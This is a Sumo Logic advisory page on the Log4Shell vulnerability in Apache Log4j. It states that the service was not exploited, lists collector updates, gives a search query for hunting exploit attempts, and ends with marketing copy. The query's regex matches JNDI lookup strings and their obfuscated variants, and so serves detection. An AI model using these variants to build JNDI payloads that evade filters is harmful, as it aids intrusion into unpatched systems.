Welcome to Sumo Logic’s content hub for the Log4Shell vulnerability with Apache Log4j. You will find our latest updates and assets on this ongoing and developing issue.
Sumo Logic update on Apache Log4j
Was Sumo Logic exploited or the service impacted?
For the initial Log4Shell vulnerability through the two subsequent CVEs, our security and engineering teams have confirmed Sumo Logic was NOT exploited and our Sumo Logic Service was never impacted.
What should Sumo Logic customers do?
We recommend all customers upgrade their Installed Collectors to this latest version (19.375-4) immediately.
How can I search for Log4j using Sumo Logic?
For queries and a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
Determining if you’re affected
- If you’re using Apache Log4j logging services in your organization, please compare your version against this Apache source for details on updating to the latest version to address the recent security vulnerabilities.
- Our Content team is actively working on developing dashboards/searches for customers to leverage to help identify potential cases of compromise within their environment.
- Using your Sumo Logic platform, here is a common search that you can use to find current versions of the exploit that bad actors may be attempting to abuse, which may help you identify cases in your own environment:
("jndi:" or "{lower:j" or "{upper:j" or "-j}" or ":-j%7") | parse regex "(?<jndi_string>\$\{(?:\$\{[^\}])?j\}?(?:\$\{[^\}])?n\}?(?:\$\{[^\}])?d\}?(?:\$\{[^\}])?i.*?:}?[^,;\"\\]+}?)[\\\";,]" nodrop
- For a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
How Sumo Logic mitigates this vulnerability
What steps have been taken?
- Beginning early in the morning on Dec. 10th, Sumo Logic’s security team investigated and validated the nature and severity of the exploit against potential points of compromise and determined that at NO time was Sumo Logic exploited.
- We use a custom SumoLog4Layout library that never invokes custom lookups (as compared to Apache Log4j) so the Sumo Logic Service was never impacted.
- Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so this never posed any significant risk. As a precaution, we released an updated Installed Collector on Dec. 11th with Log4j v2.15.0 in case the situation escalated. With the discovery of CVE-2021-45046, we updated our collector on Dec. 16th with Log4j v2.16.0. With the discovery of CVE-2021-45105, we updated our collector on Dec. 19th with Log4j v2.17.0. On Dec. 29th we updated our collector with Log4j v2.17.1 to proactively protect against CVE-2021-44832.
- Sumo Logic remains in constant communication with our customers.
- Sumo Logic’s System Security and Global Operations Center teams continue to monitor this situation closely for any change in the nature of the vulnerability, methods of compromise, and detection bypass methods.
What should Sumo Logic customers do?
- On Dec. 29th we published a new version of our Installed Collector, release 19.375-4, which has been updated to leverage Log4j v2.17.1 and address the vulnerability related to CVE-2021-44832. We recommend all customers upgrade their Installed Collectors to this latest version immediately.
- Please stay up to date with our latest releases to ensure any potential undiscovered or undisclosed issues in prior Log4j versions are not exploitable.
- Sumo Logic’s Customer Support team is following up directly with customers on known vulnerable versions to ensure all customers get to a secure/safe version as soon as possible.
- If you have any questions, please contact us at support@sumologic.com
Cloud-native architecture really matters
Built to scale
Dynamic, scalable, secure platform
We analyze more than an exabyte of data and one quadrillion records daily for over 2,300 enterprises around the world.
Multi-tenant architecture
Built for rapid deployment with consistent, continuously updated software and balanced resources across all customers.
Security by design
Built-in security from the ground up
Protect your users’ data with best-in-class security technologies, rigorous security process, and daily rotated, per-customer encryption keys.
Built with security-first principle in and for the cloud
SOC 2 Type 2, PCI DSS 3.2.1, CSA Star, FedRAMP® Moderate and HIPAA certifications.
Machine-learning powered analytics
Insightful analytics
Identify and predict anomalies in real-time with outlier detection and uncover root-causes using our patented LogReduce® and LogCompare pattern analyses.
Powerful and intuitive query-based analytics
Unshackle power users with a rich operator library and enable all users with easy to use search templates.
Do I have to upgrade my Sumo Logic collectors?
Yes, we highly recommend you update your Sumo Logic Installed Collector. Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so these vulnerabilities never posed any significant risk. As a precaution, we’ve released four updates (as of 12/29/2021) to our Installed Collector to support patches and updates the Apache Software Foundation has made to their Log4j code.
What is Log4Shell?
What’s the difference between Log4Shell and Log4j?
How is Log4j exploited?
Who is affected?
You’re not alone
EXISTING CUSTOMERS
We understand this is likely an extremely stressful time for you and your security team. If you’re a Sumo Logic customer, we want to assure you that our account team is standing by and ready to help. For any additional technical questions or concerns, please open a case with Sumo Logic Support by contacting them via email, or submitting your request.
EVERYONE
If you’re not yet a Sumo Logic customer but would like to gain a better understanding of how we’re helping organizations navigate this and future challenges, please request your own free trial.